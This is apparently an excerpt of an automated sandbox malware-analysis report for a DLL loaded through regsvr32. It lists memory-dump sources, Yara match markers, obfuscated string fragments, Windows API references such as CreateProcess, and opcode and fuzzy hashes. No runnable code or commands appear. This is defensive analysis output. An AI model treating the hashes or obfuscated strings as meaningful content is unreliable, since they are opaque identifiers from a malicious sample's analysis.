                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                    • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                                                    • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                    • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$!Iv;$=`$M@$of?$uzxY
                                                                    • API String ID: 0-1910763920
                                                                    • Opcode ID: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                                    • Instruction ID: 7899ed511868268ad7aea3719dccceda62fd29fa6bb16e154aa46d1db7c43d79
                                                                    • Opcode Fuzzy Hash: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                                    • Instruction Fuzzy Hash: F172047190478C8BDB58DF68C88A69E7FE1FB84384F20461DF95A9B260D770D989CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$*I$;*v($;3$F9p$ef~j
                                                                    • API String ID: 0-950528966
                                                                    • Opcode ID: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                                    • Instruction ID: 5057aee1002f2822c724537f3f36740fe0594223e2d956511feddf479ded4ebe
                                                                    • Opcode Fuzzy Hash: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                                    • Instruction Fuzzy Hash: 6A42E771144BCA8BCBB9CF24CC85BEF7BA0FB44306F145529D89A8A291DBB89745CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %$9w$IX$M?@$jS<$M
                                                                    • API String ID: 0-1157581923
                                                                    • Opcode ID: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                                    • Instruction ID: e375d1c8451a89c96fc0dfbd01d6dda6b37f4c7765b0f9ce143112ad2eac9b8a
                                                                    • Opcode Fuzzy Hash: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                                    • Instruction Fuzzy Hash: 8A32E4B0A147888BCBB8CF68C8897DD7BF0FB48318F90521DEA0A9B251DB745645CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %$&n$1U$Oh$j/$X
                                                                    • API String ID: 0-3716166881
                                                                    • Opcode ID: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                                    • Instruction ID: b98437ffb223a44b0e92d10549c73aaa59fdecde54cd589da16d290276777c9c
                                                                    • Opcode Fuzzy Hash: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                                    • Instruction Fuzzy Hash: D9F13C70508B88CFD7B9CF24D48969EBBF4FB84744F204A1EE5A59B260DBB09645CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: G8L$J9$ozq~$ss6$tiG$P;
                                                                    • API String ID: 0-1765782432
                                                                    • Opcode ID: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                                    • Instruction ID: 77e5b6b93cc6977e5a95292e040e55b4553736c218ba0195107264470a30d31c
                                                                    • Opcode Fuzzy Hash: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                                    • Instruction Fuzzy Hash: FCC1097050064D8FDF89DF28C89A6DE3BA1FB68398F51421DFC4A962A1C778D994CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                                                    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                    • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                                                    • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                    • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,bF$-Ie:$Y$jc$_
                                                                    • API String ID: 0-2562869522
                                                                    • Opcode ID: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                                    • Instruction ID: be835d82a8a11271eaf2d0d4144821f845ce411821323c63ff6fa91e08a90877
                                                                    • Opcode Fuzzy Hash: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                                    • Instruction Fuzzy Hash: 2F82FC7190478C8BDBBDCF24C8466DE7BE1FB88744F104A1DEA5A8A350D7B49785CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %$3'p$AVx.$R@\$|7}
                                                                    • API String ID: 0-1377184578
                                                                    • Opcode ID: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                                    • Instruction ID: 11bdd15b6fdebef4e4e33012fe2102d5287f0ed75640ad066b8b9400528ec4a7
                                                                    • Opcode Fuzzy Hash: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                                    • Instruction Fuzzy Hash: F0820774604BC88BDBB8DF24DC857CD7BE0FB86305F20561DD95E9AA60CBB89645CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .s$/$*$89$W0$j~L
                                                                    • API String ID: 0-3680180293
                                                                    • Opcode ID: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                                    • Instruction ID: f5b8073de7550f00aae71ce47ac4d0d330c984d331b26572373d31fffc6277f7
                                                                    • Opcode Fuzzy Hash: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                                    • Instruction Fuzzy Hash: 9332237050C7848FC369DF68C58A65EBBF0FB8A744F004A1EF68687260D7B6D949CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :_$DHM$J? $ioF$IE
                                                                    • API String ID: 0-1950181368
                                                                    • Opcode ID: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                                    • Instruction ID: dfce06ae3f2776b2053eb0988bfb390665c026a97965fcc171ceda4eb787facd
                                                                    • Opcode Fuzzy Hash: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                                    • Instruction Fuzzy Hash: 4E02F470A0470DEFDB99DF68C089A8EBBF1FB48344F40856AE809EB250D7749A59CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \=V$h9&$n"$wPT$5Z3
                                                                    • API String ID: 0-226182706
                                                                    • Opcode ID: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                                    • Instruction ID: 86bcb4527d36acdb60297ed143c12856cad003a08b6179b63c097fe4f6929213
                                                                    • Opcode Fuzzy Hash: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                                    • Instruction Fuzzy Hash: F7E11871A0468C8BDF59CFE8C48ABDDBBF2FB54348F004129D906BB298D774951ACB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2k$5.A$h$Tv$|
                                                                    • API String ID: 0-899094025
                                                                    • Opcode ID: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                                    • Instruction ID: fdc8e1fcc57a9d708ca924da4610569f3fbcb91b13fa75a00635c4e08a114872
                                                                    • Opcode Fuzzy Hash: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                                    • Instruction Fuzzy Hash: 2CE1B2B190474C8FDB69CFA8C48969DBFF1FB48348F20421DE869AB262D7749945CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: `H$h$T$TaK$_
                                                                    • API String ID: 963392458-2145750592
                                                                    • Opcode ID: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                                    • Instruction ID: 3659a6701c3bc18b063cae63192a65d6a0dab5b7a081606fb1710f1fc1c5873b
                                                                    • Opcode Fuzzy Hash: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                                    • Instruction Fuzzy Hash: 8FA10771D087188FDB68DFA9D8856CDBBF1FB48308F20421DE45AA7252DB70A945CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Bwu$L>yL${NC$^K
                                                                    • API String ID: 0-3175627499
                                                                    • Opcode ID: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                                    • Instruction ID: fbf4dbbb098cc7df43bbc7889590cb4d1f5602d02220e4776b40022e4a41187c
                                                                    • Opcode Fuzzy Hash: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                                    • Instruction Fuzzy Hash: 13322B70908B488FE769CF78C48665EBBF0FB84748F204A1DE6A697270DB749945CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %$N'}$Od^v$dS
                                                                    • API String ID: 0-4183360357
                                                                    • Opcode ID: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                                    • Instruction ID: 281f3f4e81126c35bb2be7146c604e5ee0be10d432db17f45780181539d507de
                                                                    • Opcode Fuzzy Hash: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                                    • Instruction Fuzzy Hash: 3342D9B190438C8BDBB8CF64C8896DD7BF1FB48318F50852DDA199B251DBB05685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +Gq$__Z%$|deb$sH
                                                                    • API String ID: 0-2072550713
                                                                    • Opcode ID: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                                    • Instruction ID: 26b4cb1fb47336c1432c1659c452027cf20818b998f95a2bcb6bb32f36742f2f
                                                                    • Opcode Fuzzy Hash: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                                    • Instruction Fuzzy Hash: 0FD1137160270DCBDB68DF28C68A6DE3BE1FF48308F504129FC5A96262D774D929CB49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5P$8r$:=$xX
                                                                    • API String ID: 0-2901174047
                                                                    • Opcode ID: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                                    • Instruction ID: 9c4e4b6ab2cee8fe4f9bfbf45665c48137a45671121b1b9ae43ff9fbf3dba1fc
                                                                    • Opcode Fuzzy Hash: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                                    • Instruction Fuzzy Hash: 35E1357191034D9BCB88DF64C8899DD7BF1FB48398F516219FC4AAB260C7789585CF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: &$Ro$X|$WW
                                                                    • API String ID: 0-419055892
                                                                    • Opcode ID: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                                    • Instruction ID: 8aa2c3e6b8818245adabd520600babaa531b4d52059a868131a34f3b668756e0
                                                                    • Opcode Fuzzy Hash: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                                    • Instruction Fuzzy Hash: 1EC1FDB150570DCBDB68CF28C58A6DE3BE5FB48308F108129FC5A9B2A0D774EA59CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tR$tR$uxX4$6)
                                                                    • API String ID: 0-566208085
                                                                    • Opcode ID: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                                    • Instruction ID: 21dbc208fb27f88b672f000d339ef1a4b78a4386f06e48fd8b1f03ba1e8317ad
                                                                    • Opcode Fuzzy Hash: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                                    • Instruction Fuzzy Hash: 84D1E5705087CC8BDBFEDF68C8857DA7BA8FB44748F104219EA0A9E269CB745749CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 57$7|$K-~$`by
                                                                    • API String ID: 0-1764728439
                                                                    • Opcode ID: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                                    • Instruction ID: 0ef0f182f1da72c174031fc5be9a225670cb57be642fb1d84f9edf9d7426cf45
                                                                    • Opcode Fuzzy Hash: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                                    • Instruction Fuzzy Hash: 5EC1227510160CCBDBA8DF38C48A6DD3BE1FF58308F605129FC2A9A266C7B4D959CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$"*$DgQ$6i
                                                                    • API String ID: 0-2770996495
                                                                    • Opcode ID: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                                    • Instruction ID: 504b32a01a029d54a9cc7c4b79b1c57dce6396aa3b2efbc72770fc67d95dc726
                                                                    • Opcode Fuzzy Hash: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                                    • Instruction Fuzzy Hash: CCB10871A0870CABDFA9DFA8E4896DDBBF1FB44344F00451DE446A7290DB749A0ECB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O:M$iJ"]$p$p
                                                                    • API String ID: 0-2745201584
                                                                    • Opcode ID: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                                    • Instruction ID: 8b688321e04c0e646b0fc78ee6d67cd940f90a9f6723fb1f8222d7259e9641f4
                                                                    • Opcode Fuzzy Hash: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                                    • Instruction Fuzzy Hash: 8AB10070D143098BCB89DFA8D486AEEBBF0FB48304F14851EE856B7250D7749A44CFA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                                                    • API String ID: 0-1867057952
                                                                    • Opcode ID: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                                    • Instruction ID: 7eafebeb16ca57a5525b51ed0f378306bc52b64ad103bedb915b9118f6e813be
                                                                    • Opcode Fuzzy Hash: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                                    • Instruction Fuzzy Hash: 1A810C36A18B4586DB94CF59E49072EB7A0F3C4794F610526EACD87BA8DBBED441CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8('$6fA$9\D$OG3
                                                                    • API String ID: 0-2292045659
                                                                    • Opcode ID: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                                    • Instruction ID: ef0df636cc5d4b1adb12f513697d006f7e6ff77cbfd46ce7bca5e6c4611c7a17
                                                                    • Opcode Fuzzy Hash: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                                    • Instruction Fuzzy Hash: 6E8166B591130DCFDB98CF28C18A5CA3BA8FF55318F00412AFC1E9A264D3B4E959CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !j$IzY$w4$0Oa
                                                                    • API String ID: 0-1210086663
                                                                    • Opcode ID: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                                    • Instruction ID: d6ae16ce1753066c3a100fad89cd7b933425bd3752a83aacc50f13ca8011d066
                                                                    • Opcode Fuzzy Hash: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                                    • Instruction Fuzzy Hash: 4E41CFB090034E8BCF88CF65C48A5DE7FB0FB68358F104619E916A6250D7B896A9CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !fl$>q$>q
                                                                    • API String ID: 0-3196423155
                                                                    • Opcode ID: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                                    • Instruction ID: 6e0169028e0bb78a63dbed9d1dbc36ce20ef11fe4735bb4ca27ada0b4c61fd75
